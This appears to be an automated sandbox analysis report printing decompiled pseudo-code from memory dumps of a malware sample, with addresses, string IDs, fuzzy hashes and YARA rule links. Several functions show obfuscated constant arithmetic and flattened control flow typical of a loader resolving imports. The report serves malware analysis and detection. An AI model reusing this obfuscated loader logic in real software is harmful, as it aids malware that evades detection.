                                              0x00237e66
                                              0x00237e6a
                                              0x00237e72
                                              0x00237e78
                                              0x00237e78
                                              0x00237e82
                                              0x00237eb7
                                              0x00237eb8
                                              0x00237ebb
                                              0x00237ec3
                                              0x00237ec5
                                              0x00237ecd
                                              0x00237ecf
                                              0x00000000
                                              0x00237ecf
                                              0x00237e84
                                              0x00237e86
                                              0x00000000
                                              0x00237e88
                                              0x00237e88
                                              0x00237e96
                                              0x00237e9b
                                              0x00237ea1
                                              0x00237ea4
                                              0x00237ea6
                                              0x00000000
                                              0x00237ea6
                                              0x00237e86
                                              0x00000000
                                              0x00237e82
                                              0x00237ed3
                                              0x00237ef1
                                              0x00237ef6
                                              0x00237efc
                                              0x00237eff
                                              0x00237f01
                                              0x00237f04
                                              0x00237f04
                                              0x00237f0d
                                              0x00237f1a

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: W:$\v;8$sV
                                              • API String ID: 0-492820393
                                              • Opcode ID: f43c86f462099f62eb88f7fdd6339907cf8ffeb19ccb006536e75fec421a179e
                                              • Instruction ID: c61a03dccfcbbad8564d908b1e445b1a335047823521a0ccf4919d1e82cfa99e
                                              • Opcode Fuzzy Hash: f43c86f462099f62eb88f7fdd6339907cf8ffeb19ccb006536e75fec421a179e
                                              • Instruction Fuzzy Hash: 9551AAB11183419FD758CF25D88A81BBBE1FB88358F500A1DF4C69A2A0D3B5CA59CF87
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022E05A, Relevance: 3.9, Strings: 3, Instructions: 126COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0022E05A(void* __ecx, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed short _v40;
				signed int _v44;
				signed int _v48;
				signed int _t107;
				signed short _t113;
				signed short _t116;
				signed short _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				intOrPtr _t124;
				signed short _t128;
				signed short* _t143;
				signed short _t145;
				void* _t146;
				signed int* _t147;

				_t147 =  &_v48;
				_v16 = 0x6d293b;
				_v12 = 0x468ef5;
				_v8 = 0;
				_v4 = 0;
				_t146 = __ecx;
				_v40 = 0x7b4e;
				_v40 = _v40 + 0xffff3b83;
				_v40 = _v40 + 0xffffa7a8;
				_v40 = _v40 ^ 0xffff5e78;
				_v20 = 0xb6a1;
				_t120 = 0x38;
				_v20 = _v20 / _t120;
				_v20 = _v20 ^ 0x00007f71;
				_v44 = 0x997f;
				_v44 = _v44 ^ 0xba9196e9;
				_v44 = _v44 ^ 0x66374254;
				_t26 =  &_v44; // 0x66374254
				_t121 = 0xe;
				_v44 =  *_t26 / _t121;
				_v44 = _v44 ^ 0x0fc29c0d;
				_v48 = 0x4c26;
				_v48 = _v48 | 0xfd76fef6;
				_v48 = _v48 >> 3;
				_v48 = _v48 ^ 0x1faed217;
				_v24 = 0xc5b2;
				_t122 = 0x42;
				_v24 = _v24 * 0x67;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x9f1566f7;
				_v28 = 0x55d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 / _t122;
				_v28 = _v28 ^ 0x0000f55e;
				_v32 = 0x8f6f;
				_t123 = 6;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 + 0xffffe8fc;
				_v32 = _v32 ^ 0x002c0f4c;
				_v36 = 0xd672;
				_v36 = _v36 / _t123;
				_v36 = _v36 + 0xffffc0a7;
				_v36 = _v36 ^ 0xffffa997;
				_t107 = _v40;
				_t124 =  *((intOrPtr*)(__edx + 0x78 + _t107 * 8));
				if(_t124 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t107 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t145 = _t124 + __ecx;
					while(1) {
						_t110 =  *((intOrPtr*)(_t145 + 0xc));
						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
							goto L13;
						}
						_t128 = E00234AAF(_t110 + _t146, _v20, _v44, _v48);
						_v40 = _t128;
						__eflags = _t128;
						if(_t128 == 0) {
							L15:
							return 0;
						}
						_t143 =  *_t145 + _t146;
						_t118 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
						while(1) {
							_t113 =  *_t143;
							__eflags = _t113;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t115 = _t113 + 2 + _t146;
								__eflags = _t113 + 2 + _t146;
							} else {
								_t115 = _t113 & 0x0000ffff;
							}
							_t116 = E00226228(_v24, _v28, _v32, _v36, _t128, _t115);
							_t147 =  &(_t147[4]);
							__eflags = _t116;
							if(_t116 == 0) {
								goto L15;
							} else {
								_t128 = _v40;
								_t143 =  &(_t143[2]);
								 *_t118 = _t116;
								_t118 = _t118 + 4;
								__eflags = _t118;
								continue;
							}
						}
						_t145 = _t145 + 0x14;
						__eflags = _t145;
					}
					goto L13;
				}
			}





























                                              0x0022e05a
                                              0x0022e05d
                                              0x0022e065
                                              0x0022e075
                                              0x0022e07b
                                              0x0022e07f
                                              0x0022e081
                                              0x0022e089
                                              0x0022e091
                                              0x0022e099
                                              0x0022e0a1
                                              0x0022e0af
                                              0x0022e0b4
                                              0x0022e0ba
                                              0x0022e0c2
                                              0x0022e0ca
                                              0x0022e0d2
                                              0x0022e0da
                                              0x0022e0de
                                              0x0022e0e3
                                              0x0022e0e9
                                              0x0022e0f1
                                              0x0022e0f9
                                              0x0022e101
                                              0x0022e106
                                              0x0022e10e
                                              0x0022e11b
                                              0x0022e11e
                                              0x0022e122
                                              0x0022e127
                                              0x0022e12f
                                              0x0022e137
                                              0x0022e144
                                              0x0022e148
                                              0x0022e150
                                              0x0022e15d
                                              0x0022e15e
                                              0x0022e162
                                              0x0022e16a
                                              0x0022e172
                                              0x0022e180
                                              0x0022e184
                                              0x0022e18c
                                              0x0022e194
                                              0x0022e198
                                              0x0022e19e
                                              0x0022e21c
                                              0x00000000
                                              0x0022e1a6
                                              0x0022e1a6
                                              0x0022e215
                                              0x0022e215
                                              0x0022e21a
                                              0x00000000
                                              0x00000000
                                              0x0022e1c1
                                              0x0022e1c3
                                              0x0022e1c7
                                              0x0022e1c9
                                              0x0022e227
                                              0x00000000
                                              0x0022e227
                                              0x0022e1d0
                                              0x0022e1d2
                                              0x0022e20c
                                              0x0022e20c
                                              0x0022e20e
                                              0x0022e210
                                              0x00000000
                                              0x00000000
                                              0x0022e1d6
                                              0x0022e1e0
                                              0x0022e1e0
                                              0x0022e1d8
                                              0x0022e1d8
                                              0x0022e1d8
                                              0x0022e1f4
                                              0x0022e1f9
                                              0x0022e1fc
                                              0x0022e1fe
                                              0x00000000
                                              0x0022e200
                                              0x0022e200
                                              0x0022e204
                                              0x0022e207
                                              0x0022e209
                                              0x0022e209
                                              0x00000000
                                              0x0022e209
                                              0x0022e1fe
                                              0x0022e212
                                              0x0022e212
                                              0x0022e212
                                              0x00000000
                                              0x0022e215

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: &L$;)m$TB7f
                                              • API String ID: 0-1597752287
                                              • Opcode ID: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
                                              • Instruction ID: f3c6b082a39df2d2a2c127311500c8bdaf2cb5b1bd70c54df38eedd81d7104ea
                                              • Opcode Fuzzy Hash: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
                                              • Instruction Fuzzy Hash: 7D51DBB12083029FD718CF25D84541BBBE1FFD4358F104A1DF89A9A261D3B4DA59CF86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002361B8, Relevance: 3.8, Strings: 3, Instructions: 77COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 97%
                                              			E002361B8(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				void* _t68;
				void* _t69;
				signed int _t71;
				void* _t75;
				void* _t76;
				signed int* _t78;

				_t78 =  &_v24;
				_v12 = 0x5dfc;
				_v12 = _v12 * 0x23;
				_t69 = __ecx;
				_v12 = _v12 << 7;
				_t75 = 0;
				_v12 = _v12 ^ 0x066cb215;
				_t76 = 0x1b4ca438;
				_v24 = 0xd6f7;
				_v24 = _v24 + 0xffffb773;
				_v24 = _v24 + 0xd9f1;
				_v24 = _v24 + 0xe528;
				_v24 = _v24 ^ 0x000200e6;
				_v16 = 0x64b4;
				_v16 = _v16 + 0xda3f;
				_v16 = _v16 >> 1;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000725d;
				_v4 = 0xc8c2;
				_v4 = _v4 | 0x9945d150;
				_v4 = _v4 + 0x9caf;
				_v4 = _v4 ^ 0x99461e9f;
				_v20 = 0xe019;
				_t71 = 0x46;
				_v20 = _v20 / _t71;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x00001f6d;
				_v8 = 0xf95b;
				_v8 = _v8 | 0x30645c78;
				_v8 = _v8 + 0xffff8663;
				_v8 = _v8 ^ 0x3064d0a8;
				do {
					while(_t76 != 0x108726d) {
						if(_t76 == 0x1b4ca438) {
							_t76 = 0x2a486598;
							continue;
						} else {
							if(_t76 == 0x2a486598) {
								_push(_t71);
								_t68 = E00237F1B();
								_t78 =  &(_t78[1]);
								_t76 = 0x108726d;
								_t75 = _t75 + _t68;
								continue;
							}
						}
						goto L7;
					}
					_t71 = _v16;
					_t64 = E0022D64E(_t71, _v4, _v20, _t69 + 4, _v8);
					_t78 =  &(_t78[3]);
					_t76 = 0xee7d46d;
					_t75 = _t75 + _t64;
					L7:
				} while (_t76 != 0xee7d46d);
				return _t75;
			}
















                                              0x002361b8
                                              0x002361bb
                                              0x002361ce
                                              0x002361d2
                                              0x002361d4
                                              0x002361d9
                                              0x002361db
                                              0x002361e3
                                              0x002361e8
                                              0x002361f5
                                              0x002361fd
                                              0x00236205
                                              0x0023620d
                                              0x00236215
                                              0x0023621d
                                              0x00236225
                                              0x00236229
                                              0x0023622e
                                              0x00236236
                                              0x0023623e
                                              0x00236246
                                              0x0023624e
                                              0x00236256
                                              0x00236264
                                              0x00236267
                                              0x0023626b
                                              0x00236270
                                              0x00236275
                                              0x0023627d
                                              0x00236285
                                              0x0023628d
                                              0x00236295
                                              0x0023629d
                                              0x0023629d
                                              0x002362ab
                                              0x002362cb
                                              0x00000000
                                              0x002362ad
                                              0x002362af
                                              0x002362b9
                                              0x002362ba
                                              0x002362bf
                                              0x002362c2
                                              0x002362c7
                                              0x00000000
                                              0x002362c7
                                              0x002362af
                                              0x00000000
                                              0x002362ab
                                              0x002362df
                                              0x002362e3
                                              0x002362e8
                                              0x002362eb
                                              0x002362f0
                                              0x002362f2
                                              0x002362f2
                                              0x00236303

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ($]r$x\d0
                                              • API String ID: 0-3053701899
                                              • Opcode ID: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
                                              • Instruction ID: e5ecf1a0709766e3ec296c9c5643fd799b8fed3d1f2e051c52c95c23f6bba54e
                                              • Opcode Fuzzy Hash: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
                                              • Instruction Fuzzy Hash: 643185B28083429FD314DF54D88901BBBE0BBE4718F004E5DF8D9A6265D3B9CE188B93
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00230B68, Relevance: 3.8, Strings: 3, Instructions: 75COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E00230B68(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t76;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t76);
				_v16 = 0x6860;
				_v16 = _v16 * 0x5b;
				_v16 = _v16 ^ 0xdc6b4abd;
				_v16 = _v16 ^ 0xdc4e778c;
				_v32 = 0xa230;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x288c6565;
				_v8 = 0xfe44;
				_v8 = _v8 | 0x4c3583fb;
				_v8 = _v8 + 0xfffff685;
				_v8 = _v8 ^ 0x61a5c761;
				_v8 = _v8 ^ 0x2d906c10;
				_v40 = 0xe5db;
				_v40 = _v40 | 0x9b65f6ba;
				_v40 = _v40 ^ 0x9b65d356;
				_v20 = 0x9adf;
				_v20 = _v20 + 0x49d9;
				_v20 = _v20 + 0xffff68ea;
				_v20 = _v20 ^ 0x00005968;
				_v36 = 0x94a7;
				_v36 = _v36 ^ 0xf3da6fb3;
				_v36 = _v36 ^ 0xf3dae7d2;
				_v28 = 0xd25a;
				_v28 = _v28 + 0x1e41;
				_v28 = _v28 | 0x2f85fa9d;
				_v28 = _v28 ^ 0x2f85d3ee;
				_v12 = 0x5326;
				_v12 = _v12 ^ 0x0ede0c0e;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x01db8a0a;
				_v24 = 0x6b2;
				_v24 = _v24 << 4;
				_v24 = _v24 | 0x9aa17d8a;
				_t63 =  &_v24;
				_v24 = _v24 ^ 0x9aa13f42;
				_push(_v32);
				_t91 = E0023889D(0x23c0b0, _v16,  *_t63);
				E0022C680(__ecx, _v40, _v20, 0x23c0b0, _v36, _a12, _t79, _a4);
				return E00232025(_v28, _t91, _v12, _v24);
			}













                                              0x00230b70
                                              0x00230b75
                                              0x00230b78
                                              0x00230b7b
                                              0x00230b7c
                                              0x00230b7d
                                              0x00230b82
                                              0x00230b92
                                              0x00230b95
                                              0x00230b9c
                                              0x00230ba3
                                              0x00230baa
                                              0x00230bae
                                              0x00230bb5
                                              0x00230bbc
                                              0x00230bc3
                                              0x00230bca
                                              0x00230bd1
                                              0x00230bd8
                                              0x00230bdf
                                              0x00230be6
                                              0x00230bed
                                              0x00230bf4
                                              0x00230bfb
                                              0x00230c02
                                              0x00230c09
                                              0x00230c10
                                              0x00230c17
                                              0x00230c1e
                                              0x00230c25
                                              0x00230c2c
                                              0x00230c33
                                              0x00230c3a
                                              0x00230c41
                                              0x00230c48
                                              0x00230c4c
                                              0x00230c50
                                              0x00230c57
                                              0x00230c5e
                                              0x00230c62
                                              0x00230c69
                                              0x00230c69
                                              0x00230c70
                                              0x00230c7e
                                              0x00230c96
                                              0x00230cb3

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: &S$`h$hY
                                              • API String ID: 0-860638928
                                              • Opcode ID: fdcdb3b1e2a54505ced5230819bb648828e9aec30cc72d6ae9c923b31416fdc6
                                              • Instruction ID: e202fd4ac2d76b1fe333a67a2c4e5903932de1a3364ecfb438eb4a33bab25221
                                              • Opcode Fuzzy Hash: fdcdb3b1e2a54505ced5230819bb648828e9aec30cc72d6ae9c923b31416fdc6
                                              • Instruction Fuzzy Hash: 45312FB1C00219EBDF49CFA1C94A8EEBFB5FF44314F208198E41276260D3B94A69DF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10007F07, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E10007F07(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                              0x10007f0c
                                              0x10007f1c

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 10007F0C
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 10007F15
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
                                              • Instruction ID: 7be572de92686af6165e4848987e7b2d669c1521723c7f37aea2a3297de6ad46
                                              • Opcode Fuzzy Hash: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
                                              • Instruction Fuzzy Hash: BAB09231044218BBEA003B91DC49BCC3F29EB056A2F004012F60D44064CF6256508AA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00235A61, Relevance: 2.7, Strings: 2, Instructions: 155COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 68%
                                              			E00235A61(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* __ecx;
				void* _t115;
				signed int _t129;
				void* _t136;
				void* _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int* _t163;

				_push(_a16);
				_t156 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0022602B(_t115);
				_v564 = 0x4767;
				_t163 =  &(( &_v600)[6]);
				_v564 = _v564 << 9;
				_v564 = _v564 ^ 0x008e895f;
				_t136 = 0x30c826c8;
				_v588 = 0x30cc;
				_v588 = _v588 + 0x4702;
				_t157 = 0x63;
				_v588 = _v588 / _t157;
				_v588 = _v588 + 0xb80e;
				_v588 = _v588 ^ 0x0000cf36;
				_v596 = 0xadf;
				_t158 = 0x66;
				_v596 = _v596 * 0x61;
				_v596 = _v596 / _t158;
				_t159 = 0x4c;
				_v596 = _v596 / _t159;
				_v596 = _v596 ^ 0x0000541c;
				_v592 = 0x64b0;
				_v592 = _v592 * 0x15;
				_v592 = _v592 + 0xa35f;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 ^ 0x0000251e;
				_v600 = 0x3c82;
				_v600 = _v600 | 0xdba50be5;
				_v600 = _v600 ^ 0x0661176e;
				_v600 = _v600 + 0x2491;
				_v600 = _v600 ^ 0xddc40dba;
				_v572 = 0x6631;
				_v572 = _v572 + 0xffff287e;
				_v572 = _v572 + 0x2e34;
				_v572 = _v572 ^ 0xffff8a80;
				_v584 = 0x3cf9;
				_v584 = _v584 ^ 0x209cd78c;
				_v584 = _v584 ^ 0x88ea975c;
				_v584 = _v584 | 0x088f8ebb;
				_v584 = _v584 ^ 0xa8ffe4fe;
				_v560 = 0x5a99;
				_v560 = _v560 << 2;
				_v560 = _v560 ^ 0x0001627e;
				_v576 = 0xc549;
				_v576 = _v576 * 0x36;
				_v576 = _v576 + 0xffff72cb;
				_v576 = _v576 ^ 0x00296382;
				_v568 = 0xc477;
				_v568 = _v568 + 0xffff852d;
				_v568 = _v568 ^ 0x00000bf7;
				_t160 = _v568;
				_v580 = 0xe5ab;
				_v580 = _v580 + 0x26f9;
				_v580 = _v580 + 0xffffb6c9;
				_v580 = _v580 ^ 0x0000c36f;
				do {
					while(_t136 != 0x96b3cdc) {
						if(_t136 == 0xc60f3b0) {
							_t129 = E00239AC7(_v572, _v584,  &_v556, _v560, _t160);
							_t163 =  &(_t163[3]);
							L11:
							asm("sbb ecx, ecx");
							_t136 = ( ~_t129 & 0xe09a757b) + 0x28d0c761;
							continue;
						}
						if(_t136 == 0x1f7f9ad4) {
							_v556 = 0x22c;
							_t129 = E002276F7( &_v556, _v592, _v600, _t160);
							goto L11;
						}
						if(_t136 == 0x28d0c761) {
							return E00234F7D(_v576, _v568, _t160);
						}
						if(_t136 != 0x2dc3f3d6) {
							if(_t136 != 0x30c826c8) {
								goto L16;
							} else {
								_t136 = 0x2dc3f3d6;
								continue;
							}
							L19:
							return _t129;
						}
						_t129 = E00221C88(_t136, _t136, _v580);
						_t160 = _t129;
						_t163 =  &(_t163[3]);
						if(_t129 != 0xffffffff) {
							_t136 = 0x1f7f9ad4;
							continue;
						}
						goto L19;
					}
					_push(_t156);
					_push( &_v556);
					if(_a4() == 0) {
						_t136 = 0x28d0c761;
						goto L16;
					} else {
						_t136 = 0xc60f3b0;
						continue;
					}
					goto L19;
					L16:
				} while (_t136 != 0x22b9bf83);
				return _t129;
			}
























                                              0x00235a6b
                                              0x00235a72
                                              0x00235a74
                                              0x00235a7b
                                              0x00235a82
                                              0x00235a89
                                              0x00235a8b
                                              0x00235a90
                                              0x00235a98
                                              0x00235a9b
                                              0x00235aa2
                                              0x00235aaa
                                              0x00235aaf
                                              0x00235abc
                                              0x00235acf
                                              0x00235ad4
                                              0x00235ada
                                              0x00235ae2
                                              0x00235aea
                                              0x00235af7
                                              0x00235afa
                                              0x00235b06
                                              0x00235b0e
                                              0x00235b11
                                              0x00235b15
                                              0x00235b1d
                                              0x00235b2a
                                              0x00235b2e
                                              0x00235b36
                                              0x00235b3b
                                              0x00235b43
                                              0x00235b4b
                                              0x00235b53
                                              0x00235b5b
                                              0x00235b63
                                              0x00235b6b
                                              0x00235b73
                                              0x00235b7b
                                              0x00235b83
                                              0x00235b8b
                                              0x00235b93
                                              0x00235b9b
                                              0x00235ba3
                                              0x00235bab
                                              0x00235bb3
                                              0x00235bbb
                                              0x00235bc0
                                              0x00235bc8
                                              0x00235bd5
                                              0x00235bd9
                                              0x00235be1
                                              0x00235be9
                                              0x00235bf1
                                              0x00235bf9
                                              0x00235c01
                                              0x00235c05
                                              0x00235c0d
                                              0x00235c15
                                              0x00235c1d
                                              0x00235c25
                                              0x00235c25
                                              0x00235c33
                                              0x00235cd1
                                              0x00235cd6
                                              0x00235cac
                                              0x00235cb0
                                              0x00235cb8
                                              0x00000000
                                              0x00235cb8
                                              0x00235c3f
                                              0x00235c9d
                                              0x00235ca5
                                              0x00000000
                                              0x00235cab
                                              0x00235c43
                                              0x00000000
                                              0x00235d11
                                              0x00235c4f
                                              0x00235c57
                                              0x00000000
                                              0x00235c5d
                                              0x00235c5d
                                              0x00000000
                                              0x00235c5d
                                              0x00235d1c
                                              0x00235d1c
                                              0x00235d1c
                                              0x00235c76
                                              0x00235c7b
                                              0x00235c7d
                                              0x00235c83
                                              0x00235c89
                                              0x00000000
                                              0x00235c89
                                              0x00000000
                                              0x00235c83
                                              0x00235cdb
                                              0x00235ce0
                                              0x00235cea
                                              0x00235cf3
                                              0x00000000
                                              0x00235cec
                                              0x00235cec
                                              0x00000000
                                              0x00235cec
                                              0x00000000
                                              0x00235cf5
                                              0x00235cf5
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: 4.$gG
                                              • API String ID: 2962429428-791606841
                                              • Opcode ID: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
                                              • Instruction ID: e985022e8010a41c9e63120a226773281c2c4a34ee85c41d4a09bb8c301803b4
                                              • Opcode Fuzzy Hash: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
                                              • Instruction Fuzzy Hash: 6E619EB11287419BD768DF24C88985FBBE0FBC4718F100E1DF58A962A0D7B58A59CB87
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022B112, Relevance: 2.6, Strings: 2, Instructions: 111COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0022B112() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				char* _t91;
				void* _t94;
				intOrPtr _t97;
				signed int _t109;
				signed int _t110;
				short* _t113;

				_v524 = _v524 & 0x00000000;
				_v536 = 0x15a9e0;
				_t94 = 0x2447ce85;
				_v532 = 0xcaf76;
				_v528 = 0x42cbc4;
				_v544 = 0x1d8c;
				_v544 = _v544 << 8;
				_v544 = _v544 ^ 0x001dbb75;
				_v564 = 0xb98d;
				_v564 = _v564 * 0x6d;
				_v564 = _v564 | 0xb6682b1a;
				_t109 = 0x16;
				_v564 = _v564 / _t109;
				_v564 = _v564 ^ 0x084aef85;
				_v568 = 0xa53e;
				_v568 = _v568 | 0x3e6d869d;
				_t110 = 0x46;
				_v568 = _v568 * 0x2b;
				_v568 = _v568 ^ 0x7c6b3e02;
				_v540 = 0x49b5;
				_v540 = _v540 + 0xbc03;
				_v540 = _v540 ^ 0x0001452b;
				_v556 = 0x9474;
				_v556 = _v556 << 0xb;
				_v556 = _v556 ^ 0xd8ad9d33;
				_v556 = _v556 ^ 0xdc0e2a5f;
				_v560 = 0x11f0;
				_v560 = _v560 + 0xffffe240;
				_v560 = _v560 + 0xb761;
				_v560 = _v560 ^ 0x000087cb;
				_v548 = 0x2457;
				_v548 = _v548 / _t110;
				_v548 = _v548 ^ 0x000075df;
				do {
					while(_t94 != 0x14e9f4e4) {
						if(_t94 == 0x21e9d2a8) {
							_t97 =  *0x23ca2c; // 0x4d8300
							_t82 = _t97 + 0x230; // 0x700047
							return E00226636(_t82, _v556, _v560, _v548, _t113);
						}
						if(_t94 == 0x2275b3e1) {
							_t91 = E00233E3F(_t94,  &_v520, __eflags, _v544, _v564);
							_t94 = 0x14e9f4e4;
							continue;
						}
						if(_t94 != 0x2447ce85) {
							goto L15;
						}
						_t94 = 0x2275b3e1;
					}
					_v552 = 0xe342;
					_v552 = _v552 ^ 0x7b193e87;
					_v552 = _v552 ^ 0x7b19ddc7;
					_t113 =  &_v520 + E00230ADC( &_v520, _v568, _v540) * 2;
					while(1) {
						_t91 =  &_v520;
						__eflags = _t113 - _t91;
						if(_t113 <= _t91) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L10:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t76 =  &_v552;
						 *_t76 = _v552 - 1;
						__eflags =  *_t76;
						if( *_t76 == 0) {
							__eflags = _t113;
							L14:
							_t94 = 0x21e9d2a8;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t94 - 0x318d27d3;
				} while (__eflags != 0);
				return _t91;
			}






















                                              0x0022b118
                                              0x0022b11f
                                              0x0022b127
                                              0x0022b12c
                                              0x0022b134
                                              0x0022b13c
                                              0x0022b144
                                              0x0022b149
                                              0x0022b151
                                              0x0022b162
                                              0x0022b16b
                                              0x0022b183
                                              0x0022b188
                                              0x0022b18e
                                              0x0022b196
                                              0x0022b19e
                                              0x0022b1b3
                                              0x0022b1b4
                                              0x0022b1b8
                                              0x0022b1c0
                                              0x0022b1c8
                                              0x0022b1d0
                                              0x0022b1d8
                                              0x0022b1e0
                                              0x0022b1e5
                                              0x0022b1ed
                                              0x0022b1f5
                                              0x0022b1fd
                                              0x0022b205
                                              0x0022b20d
                                              0x0022b215
                                              0x0022b223
                                              0x0022b227
                                              0x0022b233
                                              0x0022b233
                                              0x0022b239
                                              0x0022b2ce
                                              0x0022b2d8
                                              0x00000000
                                              0x0022b2e3
                                              0x0022b241
                                              0x0022b25b
                                              0x0022b262
                                              0x00000000
                                              0x0022b262
                                              0x0022b249
                                              0x00000000
                                              0x00000000
                                              0x0022b24b
                                              0x0022b24b
                                              0x0022b266
                                              0x0022b272
                                              0x0022b27a
                                              0x0022b294
                                              0x0022b2a8
                                              0x0022b2a8
                                              0x0022b2ac
                                              0x0022b2ae
                                              0x00000000
                                              0x00000000
                                              0x0022b299
                                              0x0022b29d
                                              0x0022b2a5
                                              0x0022b2a5
                                              0x0022b2a5
                                              0x00000000
                                              0x0022b2a5
